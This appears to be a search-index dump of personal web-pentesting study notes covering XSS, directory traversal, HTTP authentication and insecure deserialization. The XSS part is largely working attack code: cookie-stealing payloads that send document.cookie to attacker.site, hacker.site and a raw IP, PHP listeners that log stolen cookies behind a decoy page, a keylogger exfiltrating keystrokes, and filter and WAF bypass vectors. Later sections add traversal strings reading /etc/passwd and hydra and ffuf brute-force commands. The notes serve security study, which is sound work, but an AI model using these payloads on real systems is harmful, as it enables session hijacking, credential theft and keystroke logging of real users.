x\" onmouseover=\"new Image().src='https://attacker.site/c.php?cc='+escape(document.cookie)\n
                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#b-href","title":"b) href","text":"

                    For instance, this injection endpoint (INJ):

                    <a href=\"victim.site/#INJ\">\n

A payload for grabbing the cookies and having them sent to our attacker server would be:

x\" onmouseover=\"new Image().src='https://attacker.site/c.php?cc='+escape(document.cookie)\n
                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#c-height","title":"c) height","text":"

                    For instance, this injection endpoint (INJ):

                    <video  width=\"320\" height=\"INJ\">\n

A payload for grabbing the cookies and having them sent to our attacker server would be:

240\" src=x onerror=\"new Audio().src='https://attacker.site/c.php?cc='+escape(document.cookie)\n

1. One nice technique is using non-common JavaScript events.

# The usual payloads contain these functions:\nalert()\nconfirm()\nprompt()\n\n# Try less common events instead:\nonload\nonerror\nonmouseover\n...\n

                    See complete reference at: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

                    2. Sometimes the events are filtered. This is a very common regex for filtering:

                    (on\\w+\\s*=)\n

                    Bypassing it:

                    <svg/onload=alert(1)>\n<svg//////onload=alert(1)>\n<svg id=x;onload=alert(1)>\n<svg id='x'onload=alert(1)>\n

3. An improved version of the filter:

                    (?i)([\\s\\\"'`;\\/0-9\\=]+on\\w+\\s*=)\n

                    Bypassing it:

                    <svg onload%09=alert(1)>\n<svg %09onload=alert(1)>\n<svg %09onload%09=alert(1)>\n<svg onload%09%20%28%2c%3B=alert(1)>\n<svg onload%0B=alert(1)>\n

                    https://shazzer.co.uk/vectors is a great resource to see potential attack vectors.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#14-going-beyond-the-scripttag","title":"1.4. Going beyond the <script>tag","text":"
                    <a href=\"javascript:alert(1)\">click</a>\n<a href=\"data:text/html;base64,amF2YXNjcmlwdDphbGVyKDEp\">click</a>\n<form action=\"javascript:alert(1)\"><button>send</button></form>\n\n<form id=x></form><button form=\"x\" formaction=\"javascript:alert(1)\">send</button>\n
                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#2-bypassing-the-httponly-flag","title":"2. Bypassing the HTTPOnly flag","text":"

                    The HTTPOnly flag can be enabled with the response header Set-Cookie:

                    Set-Cookie: <cookie-name>=<cookie-value>; HttpOnly\n

HTTPOnly forbids JavaScript from accessing the cookies, for example, through the Document.cookie property.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#21-cross-site-tracing","title":"2.1. Cross Site Tracing","text":"

                    OWASP Cross Site Tracing reference

A technique for bypassing the HTTPOnly flag. Since script access to cookies is blocked by HTTPOnly, this technique proposes using the HTTP TRACE method instead.

The HTTP TRACE method is used for debugging: it echoes the input request back to the user. So, if we send HTTP headers normally inaccessible to JavaScript (such as the Cookie header), we will be able to read them in the response.

We will take advantage of the JavaScript object XMLHttpRequest, which provides a way to retrieve data from a URL without having to do a full page refresh:

<script> //TRACE Request\n    var xmlhttp = new XMLHttpRequest();\n    var url = 'http://victim.site/';\n    xmlhttp.withCredentials = true; // Send cookie header\n    xmlhttp.open('TRACE', url);\n\n    // Callback to log all response headers\n    function hand() { console.log(this.getAllResponseHeaders());}\n    xmlhttp.onreadystatechange = hand;\n\n    xmlhttp.send(); // Send the request\n\n</script>\n

                    Modern browsers block the HTTP TRACE method in XMLHttpRequest and other scripting languages and libraries such as JQuery, Silverlight... But if the attacker finds another way of doing HTTP TRACE requests, then they can bypass the HTTPOnly flag.

For instance, Amit Klein found a simple trick for IE 6.0 SP2. Instead of using TRACE for the method, he used \\r\\nTRACE, and the payload worked under certain circumstances.

CVE-2012-0053: Apache HTTPOnly cookie disclosure, affecting Apache HTTP Server 2.2.x through 2.2.21. For an HTTP header value exceeding the server limits, the server responded with an HTTP 400 Bad Request that included the complete headers, containing the HTTPOnly cookies (https://gist.github.com/pilate/1955a1c28324d4724b7b). BeEF has a module named Apache Cookie Disclosure, available under the Exploits section.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#22-beef-tunneling-proxy","title":"2.2. BeEF Tunneling Proxy","text":"

An alternative to stealing protected cookies is to use the victim's browser as a proxy. The Tunneling Proxy in BeEF exploits the XSS flaw and uses the victim's browser to perform requests as the victim user to the web application. Basically, it tunnels requests through the hooked browser. By doing so, there is no way for the web application to distinguish between requests coming from a legitimate user and requests forged by an attacker. BeEF also allows you to bypass other web developer protection techniques, such as using multiple validations (User-Agent, custom headers,...).

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#bypassing-wafs","title":"Bypassing WAFs","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#modsecurity","title":"ModSecurity","text":"
<svg onload='new Function`[\"_Y000!_\"].find(al\u0065rt)`'>\n
                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#examples-of-typical-attacks","title":"Examples of typical attacks","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#1-cookie-stealing-examples-and-techniques","title":"1. Cookie stealing: examples and techniques","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#example-1","title":"Example 1","text":"

                    Identify an injection endpoint and test that the app is vulnerable to a basic xss payload such as:

<script>alert('lala')</script>\n

Once you know it is vulnerable, prepare malicious JavaScript code for stealing the cookies:

                    <script>\nvar i = new Image();\ni.src = \"http://attacker.site/log.php?q=\"+document.cookie;\n</script>\n

                    Add that code to the injection endpoint that you detected in step 1. That code will save the cookie in a text file on the attacker site.

Create a PHP file (log.php) on the attacker site for capturing the sent cookie:

    <?php\n        $filename=\"/tmp/log.txt\";\n        $fp=fopen($filename, 'a');\n        $cookie=$_GET['q'];\n        fwrite($fp, $cookie);\n        fclose($fp);\n    ?>\n

Open the listener on the attacker site and send the crafted URL with the payload included. Once someone opens it, their cookie jar will be sent to the attacker.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#example-2","title":"Example 2","text":"
1. The attacker creates a get.php file and saves it on their server.

2. This PHP file will store the data that the attacker's server receives into a file.

3. This could be the content of the get.php file:

<?php\n    $ip = $_SERVER['REMOTE_ADDR'];\n    $browser = $_SERVER['HTTP_USER_AGENT'];\n\n    $fp = fopen('jar.txt', 'a');\n\nfwrite($fp, $ip . ' ' . $browser . \" \\n\");\nfwrite($fp, urldecode($_SERVER['QUERY_STRING']) . \" \\n\\n\");\nfclose($fp);\n?>\n
4. Now the attacker manages to store this payload in the web server:
<script>\nvar i = new Image();\ni.src = \"http://attacker.site/get.php?cookie=\"+escape(document.cookie);\n</script>\n\n# Or in one line:\n<script>var i = new Image(); i.src = \"http://10.86.74.7/moville.php?cookie=\"+escape(document.cookie); </script>\n
                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#techniques-for-cookie-stealing","title":"Techniques for cookie stealing","text":"

                    Let's suppose we have our PHP script C.php listening on our hacker.site domain.

Example of a simple C.php listener:

# Instruct the script to simply store the GET['cc'] content in a file\n<?php\nerror_reporting(0); # Turn off all error reporting\n$cookie= $_GET['cc']; # Request to log\n$file= '_cc_.txt'; # The log file\n$handle= fopen($file,\"a\"); # Open log file in append mode\nfwrite($handle,$cookie.\"\\n\"); # Append the cookie\nfclose($handle); # Close the file\n\necho '<h1>Page under construction</h1>'; # Trying not to raise suspicion.\n

Example of a C.php listener recording hosts, time of logging, and IP addresses:

# Instruct the script to store the QUERY_STRING content in a file, together with some context\n<?php\nerror_reporting(0); # Turn off all error reporting\n\nfunction getVictimIP() { ... } # Function that returns the victim IP\nfunction collect() {\n$file= '_cc_.txt'; # The log file\n$date=date(\"l dS of F Y h:i:s A\");\n$IP=getVictimIP();\n$cookie= $_SERVER['QUERY_STRING'];\n\n$log=\"[$date]\\n\\t> VictimIP: $IP\\n\\t> Cookies: $cookie\\n\\t> Extra info: $info\\n\";\n$handle= fopen($file,\"a\"); # Open log file in append mode\nfwrite($handle,$log.\"\\n\\b\"); # Append the log entry\nfclose($handle); # Close the file\n}\ncollect();\necho '<h1>Page under construction</h1>'; # Trying not to raise suspicion.\n

Additionally, we can use netcat, BeEF,...

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#2-dom-based-attack-incorrect-use-of-eval","title":"2. DOM based attack: incorrect use of eval()","text":"

In the vulnerable website's source code we can pinpoint this script:

                    <script>\n    var statement = document.URL.split(\"statement=\")[1];\n    document.getElementById(\"result\").innerHTML = eval(statement);\n</script>\n

This JavaScript code calculates and dynamically displays the result of the arithmetic operation via the DOM: it splits the URL and passes the value of the statement parameter to the JavaScript eval() function for evaluation/calculation.

                    The JavaScript\u00a0eval()\u00a0function is typically used by developers to evaluate JavaScript code, however, in this case, it has been improperly implemented to evaluate/perform the arithmetic operation specified by the user.

                    NOTE: The eval()\u00a0function should never be used to execute JavaScript code in the form of a string as it can be leveraged by attackers to perform arbitrary code execution.

Given the improper implementation of the eval() function, we can inject our XSS payload as a value of the statement parameter and force the eval() function to execute the JavaScript payload.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#3-defacements","title":"3. Defacements","text":"

We may categorize defacements into two types: non-persistent (virtual) and persistent.

                    • Non-persistent defacements don't modify the content hosted on the target web application. They are basically abusing Reflected XSS.
                    # Code\n<?php $name = @$_GET['name']; ?>\nWelcome <?=$name?>\n\n# URL\nhttps://victim.site/XSS/reflected.php?name=%3Cscript%3Edocument.body.innerHTML=%22%3Cimg%20src=%27http://hackersite/pwned.png%27%3E%22%3C/script%3E\n
• Persistent defacements permanently modify the content hosted on the target web application. They are basically abusing Stored XSS.

                    Tools for cloning a website

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#4-keyloggers","title":"4. Keyloggers","text":"

                    A tool: http_javascript_keylogger. See also my notes on that metasploit module.

                    Event logger from BeEF.

                    The following code:

                    var keys = \"\" //Where > where to store the key strokes\ndocument.onkeypress = function(e) {\n    var get = windows.event ? event : eM\n    var key = get.keyCode ? get.keyCode : get.charCode;\n    key = String.fromCharCode(key);\n    keys += key;\n}\n\nwindow.setInterval(function()) {\n    if(keys != \"\") {\n        //HOW> sends the key strokes via GET using an Image element to listening hacker.site server\n        var path = encodeURI(\"http://hacker.site/keylogger?k=\" + keys);\n        new Image().src = path;\n        keys = \"\";\n\n    }\n}, 1000; // WHEN > sends the key strokes every second\n

Additionally, we have the metasploit module auxiliary(http_javascript_keylogger), an advanced version of the previous JavaScript code. It creates the JavaScript payload with a keylogger, which can be injected into the vulnerable web page, and it automatically starts the listening server. To see how it works, set the DEMO option to true.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#5-network-attacks","title":"5. Network attacks","text":"

A way to get inside intranet networks is through HTTP traffic which, unlike other protocols, is usually allowed through firewalls.

                    1. IP detection

The first step before setting foot in a network is to retrieve as much network information as possible about the hooked browser, for instance by revealing its internal IP address and subnet.

Traditionally, this required the use of external browser plugins such as the Java JRE and some interaction from the victim: installing the My Address Java Applet (an unsigned Java applet that retrieves the IP) and changing the Java security settings (enabling them or reducing the security level).

Nowadays, https://net.ipcalf.com/ can be used, which abuses the WebRTC HTML5 feature.

                    2. Subnet detection

                    3. Ping Sweeping

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#6-bypassing-restrictions-in-frameset-tag","title":"6. Bypassing restrictions in frameset tag","text":"

                    See https://www.doyler.net/security-not-included/frameset-xss.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#mitigations-for-cookie-stealing","title":"Mitigations for cookie stealing","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#httponly","title":"HTTPOnly","text":"

                    The HTTPOnly flag can be enabled with the response header Set-Cookie:

                    Set-Cookie: <cookie-name>=<cookie-value>; HttpOnly\n

HTTPOnly forbids JavaScript from accessing the cookies, for example, through the Document.cookie property. Note that a cookie created with the HttpOnly directive will still be sent with JavaScript-initiated requests, for example, when calling XMLHttpRequest.send() or fetch(). This mitigates attacks against cross-site scripting (XSS).

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#tools-and-payloads","title":"Tools and payloads","text":"
                    • XSSER: An automated web pentesting framework tool to detect and exploit XSS vulnerabilities
                    • Vectors (payload) regularly updated: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet.
                    • Evasion Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html.
                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/directory-traversal/","title":"Directory Traversal attack","text":"OWASP

                    OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.1. Testing Directory Traversal File Include

                    ID Link to Hackinglife Link to OWASP Description 5.1 WSTG-ATHZ-01 Testing Directory Traversal File Include - Identify injection points that pertain to path traversal. - Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion) Resources
• PayloadsAllTheThings

                    Directory traversal vulnerabilities, also known as path traversal or directory climbing vulnerabilities, are a type of security vulnerability that occurs when a web application allows unauthorized access to files and directories outside the intended or authorized directory structure. Directory traversal vulnerabilities can lead to serious data breaches and system compromises if not addressed/mitigated.

                    Directory traversal vulnerabilities typically arise from improper handling of user input, especially when dealing with file or directory paths. This input could be obtained from URL parameters, user-generated content, or other sources. An attacker takes advantage of lax input validation or insufficient sanitization of user inputs. They manipulate the input by adding special characters or sequences that trick the application into navigating to directories it shouldn't have access to.

                    ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/directory-traversal/#before-testing","title":"Before testing","text":"

                    Each operating system uses different characters as path separator:

                    Unix-like OS:

                    root directory: \"/\"\ndirectory separator: \"/\"\n

                    Windows OS' Shell':

                    root directory: \"<drive letter>:\\\"\ndirectory separator: \"\\\" or \"/\"\n

                    Classic Mac OS:

                    root directory: \"<drive letter>:\"\ndirectory separator: \":\"\n
                    ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/directory-traversal/#basic-exploitation","title":"Basic exploitation","text":"

We can use the .. characters to access the parent directory. The following strings are several encodings that can help you bypass a poorly implemented filter.

                    ../\n..\\\n..\\/\n\n\n#####\n# - URL encoding and double URL encoding\n#####\n\n# ../\n%2e%2e%2f\n%2e%2e/\n..%2f\n\n# ..\\\n%2e%2e%5c\n%2e%2e\\\n..%5c\n%252e%252e%255c\n\n... \n%252e%252e%252f\n%c0%ae%c0%ae%c0%af\n%uff0e%uff0e%u2215\n%uff0e%uff0e%u2216\n
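As a quick sketch of how these strings are used (target and page parameter are hypothetical):

# Hypothetical vulnerable parameter\ncurl \"http://victim.site/index.php?page=../../../etc/passwd\"\n\n# Same request with the traversal URL-encoded to dodge naive filters\ncurl \"http://victim.site/index.php?page=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd\"\n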
                    ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/directory-traversal/#interesting-files","title":"Interesting files","text":"

                    Interesting Windows files Interesting Linux files

                    ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/directory-traversal/#tools-and-payloads","title":"Tools and payloads","text":"
                    • See updated chart: Attacks and tools for web pentesting.
                    • DotDotPwn - The Directory Traversal Fuzzer -\u00a0http://dotdotpwn.sectester.net
                    ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/http-authentication-schemes/","title":"HTTP Authentication Schemes","text":"

                    This resource is pretty awesome: https://learn.microsoft.com/en-us/dotnet/framework/wcf/feature-details/understanding-http-authentication.

I'll be (CTRL-c-CTRL-v)ing what I think is important.

                    ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#understanding-http-authentication","title":"Understanding HTTP Authentication","text":"

                    Authentication is the process of identifying whether a client is eligible to access a resource. The HTTP protocol supports authentication as a means of negotiating access to a secure resource.

The initial request from a client is typically an anonymous request, not containing any authentication information. HTTP server applications can deny the anonymous request while indicating that authentication is required. The server application sends WWW-Authenticate headers to indicate the supported authentication schemes.

                    ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#http-authentication-schemes_1","title":"HTTP Authentication Schemes","text":"Authentication Scheme Description Anonymous An anonymous request does not contain any authentication information. This is equivalent to granting everyone access to the resource. Basic Basic authentication sends a Base64-encoded string that contains a user name and password for the client. Base64 is not a form of encryption and should be considered the same as sending the user name and password in clear text. If a resource needs to be protected, strongly consider using an authentication scheme other than basic authentication. Digest Digest authentication is a challenge-response scheme that is intended to replace Basic authentication. The server sends a string of random data called a nonce to the client as a challenge. The client responds with a hash that includes the user name, password, and nonce, among additional information. The complexity this exchange introduces and the data hashing make it more difficult to steal and reuse the user's credentials with this authentication scheme. Digest authentication requires the use of Windows domain accounts. The digest realm is the Windows domain name. Therefore, you cannot use a server running on an operating system that does not support Windows domains, such as Windows XP Home Edition, with Digest authentication. Conversely, when the client runs on an operating system that does not support Windows domains, a domain account must be explicitly specified during the authentication. NTLM NT LAN Manager (NTLM) authentication is a challenge-response scheme that is a securer variation of Digest authentication. NTLM uses Windows credentials to transform the challenge data instead of the unencoded user name and password. NTLM authentication requires multiple exchanges between the client and server. The server and any intervening proxies must support persistent connections to successfully complete the authentication. Negotiate Negotiate authentication automatically selects between the Kerberos protocol and NTLM authentication, depending on availability. The Kerberos protocol is used if it is available; otherwise, NTLM is tried. Kerberos authentication significantly improves upon NTLM. Kerberos authentication is both faster than NTLM and allows the use of mutual authentication and delegation of credentials to remote machines. Windows Live ID The underlying Windows HTTP service includes authentication using federated protocols. However, the standard HTTP transports in WCF do not support the use of federated authentication schemes, such as Microsoft Windows Live ID. Support for this feature is currently available through the use of message security.","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#basic-http-authentication","title":"Basic HTTP Authentication","text":"

                    Basic HTTP authentication is a simple authentication mechanism used in web applications and services to restrict access to certain resources or functionalities. Basic authentication sends a Base64-encoded string that contains a user name and password for the client. Base64 is not a form of encryption and should be considered the same as sending the user name and password in clear text. If a resource needs to be protected, strongly consider using an authentication scheme other than basic authentication.

                    • Client Request: When a client (usually a web browser) makes a request to a protected resource on a server, the server responds with a 401 Unauthorized status code if the resource requires authentication.
                    • Challenge Header: In the response, the server includes a WWW-Authenticate header with the value \"Basic.\" This header tells the client that it needs to provide credentials to access the resource.
• Credential Format: The client constructs a string in the format username:password and encodes it in Base64. It then includes this encoded string in an Authorization header in subsequent requests. The header looks like this: Authorization: Basic <base64(username:password)>
• Server Validation: When the server receives the request with the Authorization header, it decodes the Base64-encoded credentials, checks them against its database of authorized users, and grants access if the credentials are valid.
• Access Granted or Denied: If the credentials are valid, the server allows access to the requested resource by responding with the resource content and a 200 OK status code. If the credentials are invalid or missing, it continues to respond with 401 Unauthorized.
","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#how-to-attack-it","title":"How to attack it","text":"

You can perform dictionary attacks with Burpsuite by encoding the payload with Base64. You can also use hydra.
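A minimal sketch of both approaches (target IP, path, and wordlist are placeholders):

# Dictionary attack against Basic auth (http-get sends the Authorization: Basic header)\nhydra -l admin -P /usr/share/wordlists/rockyou.txt 192.155.195.3 http-get /basic/\n\n# Crafting the header value manually for a single guess\necho -n 'admin:password123' | base64\n# YWRtaW46cGFzc3dvcmQxMjM=\n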

                        ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#digest-http-authentication","title":"Digest HTTP Authentication","text":"

                        HTTP Digest Authentication is an authentication mechanism used in web applications and services to securely verify the identity of users or clients trying to access protected resources. It addresses some of the security limitations of Basic Authentication by employing a challenge-response mechanism and hashing to protect user credentials during transmission. However, like Basic Authentication, it's important to use HTTPS to ensure the security of the communication.

                        • Client Request: When a client (usually a web browser) makes a request to a protected resource on a server, the server responds with a 401 Unauthorized status code if authentication is required.
                        • Challenge Header: In the response, the server includes a WWW-Authenticate header with the value \"Digest.\" This header provides information needed by the client to construct a secure authentication request. Example of a WWW-Authenticate header:
                        WWW-Authenticate: Digest realm=\"Example\", qop=\"auth\", nonce=\"dcd98b7102dd2f0e8b11d0f600bfb0c093\", opaque=\"5ccc069c403ebaf9f0171e9517f40e41\"\n\n# Where:\n# - **realm**: A descriptive string indicating the protection space (usually the name of the application or service).\n# - **qop (Quality of Protection)**: Specifies the quality of protection. Commonly set to \"auth.\"\n# - **nonce**: A unique string generated by the server for each request to prevent replay attacks.\n# - **opaque**: An opaque value set by the server, which the client must return unchanged in the response.\n
                        • Client Response: The client constructs a response using the following components: Username, Realm, Password, Nonce, Request URI (the path to the protected resource), HTTP method (e.g., GET, POST), cnonce (a client-generated nonce), qop (the quality of protection), H(A1) and H(A2), which are hashed values derived from the components. It then calculates a response hash (response) based on these components and includes it in an Authorization header. Example Authorization header:
                        Authorization: Digest username=\"user\", realm=\"Example\", nonce=\"dcd98b7102dd2f0e8b11d0f600bfb0c093\", uri=\"/resource\", qop=auth, nc=00000001, cnonce=\"0a4f113b\", response=\"6629fae49393a05397450978507c4ef1\", opaque=\"5ccc069c403ebaf9f0171e9517f40e41\"\n
                        • Server Validation: The server receives the request with the Authorization header and validates the response hash calculated by the client. It does this by reconstructing the same components and calculating its own response hash. If the hashes match, the server considers the client authenticated and grants access to the requested resource.
                        ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#how-to-attack-it_1","title":"How to attack it","text":"

                        We can use hydra.

                        hydra -l admin -P /root/Desktop/wordlists/100-common-passwords.txt http-get://192.155.195.3/digest/\n\nhydra 192.155.195.3 -l admin -P /root/Desktop/wordlists/100-common-passwords.txt http-get /digest/\n
                        ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#multifactor-authentication","title":"Multifactor Authentication","text":"","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#otp","title":"OTP","text":"

                        OTP (One-Time Password) security is a two-factor authentication (2FA) method used to enhance the security of user accounts and systems. OTPs are temporary, single-use codes that are typically generated and sent to the user's registered device (such as a mobile phone) to verify their identity during login or transaction processes. The primary advantage of OTPs is that they are time-sensitive and expire quickly, making them difficult for attackers to reuse.

For bruteforcing OTPs, OWASP ZAP is more recommended since it does not introduce delays or throttling.

                        ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#types-of-otps","title":"Types of OTPs","text":"
                        • Time-Based OTPs (TOTP): TOTP is a widely used OTP method that generates codes based on a shared secret key and the current time. These codes are typically valid for a short duration, often 30 seconds.
                        • SMS-Based OTPs: OTPs can be sent to users via SMS messages. When users log in, they receive an OTP on their mobile phone, which they must enter to verify their identity.
                        • Rate Limiting and Lockout: Implement rate limiting and account lockout mechanisms to prevent brute force attacks on OTPs. Lockout accounts after a certain number of failed OTP attempts. OTP rate limiting is a security mechanism used to prevent brute force attacks or abuse of one-time password (OTP) systems, such as those used in two-factor authentication (2FA). Rate limiting restricts the number of OTP verification attempts that can be made within a specified time period. By enforcing rate limits, organizations can reduce the risk of attackers guessing or trying out multiple OTPs in quick succession.
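As an illustrative sketch of why rate limiting matters (endpoint, parameter, and failure message are hypothetical):

# Generate all 4-digit OTP candidates\nseq -w 0000 9999 > otps.txt\n\n# Spray them against a hypothetical verification endpoint, filtering out failures\nffuf -w otps.txt -u https://victim.site/verify -X POST -H \"Content-Type: application/x-www-form-urlencoded\" -d \"otp=FUZZ\" -fr \"Invalid code\"\n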
                        ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/insecure-deserialization/","title":"Insecure deserialization","text":"

                        Insecure deserialization is when user-controllable data is deserialized by a website. This potentially enables an attacker to manipulate serialized objects in order to pass harmful data into the application code.

                        Sources for these notes
                        • Portswigger: Insecure deserialization.
                        • Hacktricks: Deserialization.
                        • OWASP deserialization Cheat sheet.
                        Tools
                        • Java: ysoserial
                        • PHP: phpggc.
                        • Burpsuite Extensions: Java Deserialization Scanner, PHP Object Injection Slinger, PHP Object Injection Check
                        • Exploits: Ruby 2.X generic deserialization to RCE gadget chain
                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#what-is-deserialization","title":"What is deserialization","text":"
                        • Serialization\u00a0is the process of converting complex data structures, such as objects and their fields, into a \"flatter\" format that can be sent and received as a sequential stream of bytes.

                        • Deserialization\u00a0is the process of restoring this byte stream to a fully functional replica of the original object, in the exact state as when it was serialized.

                        Exactly how objects are serialized depends on the language. Some languages serialize objects into binary formats, whereas others use different string formats, with varying degrees of human readability. \u00a0

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#identifying","title":"Identifying","text":"","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#php","title":"PHP","text":"

                        PHP uses a mostly human-readable string format, with letters representing the data type and numbers representing the length of each entry.

                        For example, consider a\u00a0User\u00a0object with the attributes:

                        $user->name = \"carlos\"; $user->isLoggedIn = true;

                        When serialized, this object may look something like this:

                        O:4:\"User\":2:{s:4:\"name\":s:6:\"carlos\"; s:10:\"isLoggedIn\":b:1;}

                        - `O:4:\"User\"`\u00a0- An object with the 4-character class name\u00a0`\"User\"`\n- `2`\u00a0- the object has 2 attributes\n- `s:4:\"name\"`\u00a0- The key of the first attribute is the 4-character string\u00a0`\"name\"`\n- `s:6:\"carlos\"`\u00a0- The value of the first attribute is the 6-character string\u00a0`\"carlos\"`\n- `s:10:\"isLoggedIn\"`\u00a0- The key of the second attribute is the 10-character string\u00a0`\"isLoggedIn\"`\n- `b:1`\u00a0- The value of the second attribute is the boolean value\u00a0`true`\n

                        The native methods for PHP serialization are\u00a0serialize()\u00a0and\u00a0unserialize(). If you have source code access, you should start by looking for\u00a0unserialize()\u00a0anywhere in the code and investigating further.
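A minimal runnable sketch of that format, using the User example from above:

<?php\nclass User {\n    public $name;\n    public $isLoggedIn;\n}\n\n$user = new User();\n$user->name = \"carlos\";\n$user->isLoggedIn = true;\n\n// Prints: O:4:\"User\":2:{s:4:\"name\";s:6:\"carlos\";s:10:\"isLoggedIn\";b:1;}\necho serialize($user);\n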

                        In PHP, specific magic methods are utilized during the serialization and deserialization processes:

                        • __sleep: Invoked when an object is being serialized. This method should return an array of the names of all properties of the object that should be serialized. It's commonly used to commit pending data or perform similar cleanup tasks.

                        • __wakeup: Called when an object is being deserialized. It's used to reestablish any database connections that may have been lost during serialization and perform other reinitialization tasks.

                        • __unserialize: This method is called instead of __wakeup (if it exists) when an object is being deserialized. It gives more control over the deserialization process compared to __wakeup.

                        • __destruct: This method is called when an object is about to be destroyed or when the script ends. It's typically used for cleanup tasks, like closing file handles or database connections.

                        • __toString: This method allows an object to be treated as a string. It can be used for reading a file or other tasks based on the function calls within it, effectively providing a textual representation of the object.
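
                        A minimal sketch of when these hooks fire, assuming PHP 7.x (from PHP 7.4 onwards, __unserialize() takes precedence over __wakeup() if both are defined):

                        <?php\nclass Connection {\n    public $host = 'db.local';\n    private $link;\n\n    public function __sleep() {\n        echo 'sleep: choosing what to persist', PHP_EOL;\n        return ['host'];              // only the host property is serialized\n    }\n\n    public function __wakeup() {\n        echo 'wakeup: re-establishing state', PHP_EOL;\n        $this->link = 'reconnected';  // e.g. reopen a database connection\n    }\n\n    public function __destruct() {\n        echo 'destruct: cleaning up', PHP_EOL;\n    }\n}\n\n$conn = new Connection();\n$s = serialize($conn);   // __sleep fires here\n$c = unserialize($s);    // __wakeup fires here\n// __destruct fires for $conn and $c when they go out of scope.\n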

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#java","title":"Java","text":"

                        Some languages, such as Java, use binary serialization formats.

                        To distinguish it: serialized Java objects always begin with the same bytes, which are encoded as\u00a0ac ed\u00a0in hexadecimal and\u00a0rO0\u00a0in Base64.

                        Any class that implements the interface\u00a0java.io.Serializable\u00a0can be serialized and deserialized.

                        If you have source code access, take note of any code that uses the\u00a0readObject()\u00a0method, which is used to read and deserialize data from an\u00a0InputStream.

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#attacks","title":"Attacks","text":"","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#1-manipulate-serialized-objects","title":"1. Manipulate serialized objects","text":"

                        As a simple example, consider a website that uses a serialized\u00a0User\u00a0object to store data about a user's session in a cookie. If an attacker spotted this serialized object in an HTTP request, they might decode it to find the following byte stream:

                        O:4:\"User\":2:{s:8:\"username\";s:6:\"carlos\";s:7:\"isAdmin\";b:0;}

                        The\u00a0isAdmin\u00a0attribute is an obvious point of interest. An attacker could simply change the boolean value of the attribute to\u00a01\u00a0(true), re-encode the object, and overwrite their current cookie with this modified value. In isolation, this has no effect. However, let's say the website uses this cookie to check whether the current user has access to certain administrative functionality:

                        $user = unserialize($_COOKIE['session']);\nif ($user->isAdmin === true) {\n    // allow access to admin interface\n}\n

                        This vulnerable code would instantiate a\u00a0User\u00a0object based on the data from the cookie, including the attacker-modified\u00a0isAdmin\u00a0attribute. At no point is the authenticity of the serialized object checked. This data is then passed into the conditional statement and, in this case, would allow for an easy privilege escalation.

                        Burpsuite lab

                        Burpsuite Lab: Modifying serialized objects

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#2-modify-data-types","title":"2. Modify data types","text":"

                        PHP-based logic is particularly vulnerable to this kind of manipulation due to the behavior of its loose comparison operator (==) when comparing different data types.

                        Reference: PHP type juggling

